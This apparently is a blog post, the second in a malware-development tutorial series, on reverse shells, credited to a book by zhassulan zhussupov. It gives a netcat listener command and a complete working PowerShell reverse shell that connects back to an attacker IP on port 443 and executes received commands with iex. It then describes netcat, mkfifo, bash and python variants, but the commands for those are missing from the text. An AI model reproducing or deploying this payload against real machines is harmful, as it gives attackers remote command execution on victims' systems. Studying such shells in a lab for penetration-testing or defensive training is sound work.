“Infected Innovation: The Malware Mastermind”
What is Malware Development ?
Whether you specialize in Red Team or Blue Team operations, gaining expertise in malware development techniques and tactics offers a holistic understanding of advanced attack strategies. Since most malware targets Windows, learning to develop it gives you valuable skills in Windows programming.
Most of the tutorials in this series require a intermediate level understanding of the C/C++ programming languages.
Malware Development Tricks and Techniques
Reverse Shells
This is a very important thing in the malware development.
Attacker : nc -lvnp 443
nc: This is the Netcat command.
-l: It makes Netcat listen for incoming connections.
-v: It enables verbose mode, providing more detailed output.
-n: It tells Netcat not to resolve hostnames.
-p 443: It specifies the port number to listen on.Victim :
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.15', 443)
$stream = $client.GetStream()
$encoding = [System.Text.Encoding]::UTF8
while ($true) {
$bytes = New-Object byte[] 4096
$length = $stream.Read($bytes, 0, $bytes.Length)
if ($length -le 0) { break }
$data = $encoding.GetString($bytes, 0, $length)
$sendback = (iex $data 2>&1)
$sendback += 'PS ' + (Get-Location).Path + '> '
$sendbackBytes = $encoding.GetBytes($sendback)
$stream.Write($sendbackBytes, 0, $sendbackBytes.Length)
}
Note : Convert your Both virtual machine Network ( Linux and Windows ) from NAT to Bridged Adapter.
what is reverse shell?
Reverse shell or often called connect-back shell is remote shell introduced from the target by connecting back to the attacker machine and spawning target shell on the attacker machine. This usually used during exploitation process to gain control of the remote machine.
Reverse shells are a common tactic employed by red teamers and pentesters when facing firewall restrictions on inbound connections. By utilizing outbound ports such as 80, 443, or 8080, they can bypass these restrictions. However, it’s crucial to note that this approach exposes the attacker’s control server, making it susceptible to detection by network security monitoring services.
The process typically involves three steps.
First, the attacker exploits a vulnerability in the target system or network, granting them the ability to execute code. Next, they set up a listener on their own machine. Finally, they inject a reverse shell into the vulnerable system to exploit the vulnerability.
It’s important to recognize another potential risk: in real cyber attacks, reverse shells can also be obtained through social engineering tactics. For instance, malware distributed via phishing emails or malicious websites can initiate outgoing connections to a command server, providing hackers with reverse shell capabilities.
In summary, while reverse shells offer a workaround for firewall restrictions, they come with inherent risks, including exposure to detection and exploitation through social engineering tactics.
The purpose of this post is not to exploit a vulnerability in the target host or network, but the idea is to find a vulnerability that can be leverage to perform a code execution.
Depending on which system is installed on the victim and what services are running there, the reverse shell will be different, it may be php, python, jsp etc.
listener
For simplicity, in this example, the victim allow outgoing connection on any port (default iptables firewall rule). In our case we use 4444 as a listener port. You can change it to your preferable port you like. Listener could be any program/utility that can open TCP/UDP connections or sockets. In most cases I like to use nc or netcat utility.
In this case , The -l flag tells Netcat to listen for incoming connections, the -v flag enables verbose output, the -n flag prevents DNS resolution, and the -p flag specifies the port number.
run reverse shell (examples)
Again for simplicity, in our examples target is a linux machine.
1. netcat
run :
where 192.168.1.15 is your attacker’s machine IP and 4444 is listening port.
Here, we successfully obtained the reverse shell.
2. netcat without -e
Newer Linux machine by default has traditional netcat with GAPING_SECURITY_HOLE disabled, it means you don’t have the -e option of netcat.
In this case, in the victim machine run:
Here, I’ve first created a named pipe (AKA FIFO) called p using the mkfifo command. The mkfifo command will create things in the file system, and here use it as a “backpipe” that is of type p, which is a named pipe. This FIFO will be used to shuttle data back to our shell’s input. I created my backpipe in /tmp because pretty much any account is allowed to write there.
3. bash
This will not work on old debian-based linux distributions
run:
4. python
To create a semi-interactive shell using python.
run:
I hope you understand the importance and concept of a reverse shell. It’s very important in the context of Malware Development.
Credit goes to : zhassulan zhussupov
From his book, I learned the concepts and analyzed them in detail. After doing all this, I will apply those attacks steps practically on my Linux and Windows systems, as you can see from the screenshot above , and I will try to add my own additional information into the article.
I have no intention of stealing content from his book and presenting it as my own. The entire credit goes to him because I learned all these tricks and techniques from his book. Whatever concepts I learned from him, I will always apply them myself first on my computer before writing the blog.
Part-3 going to be more interesting.
I hope you like Part-2 : )
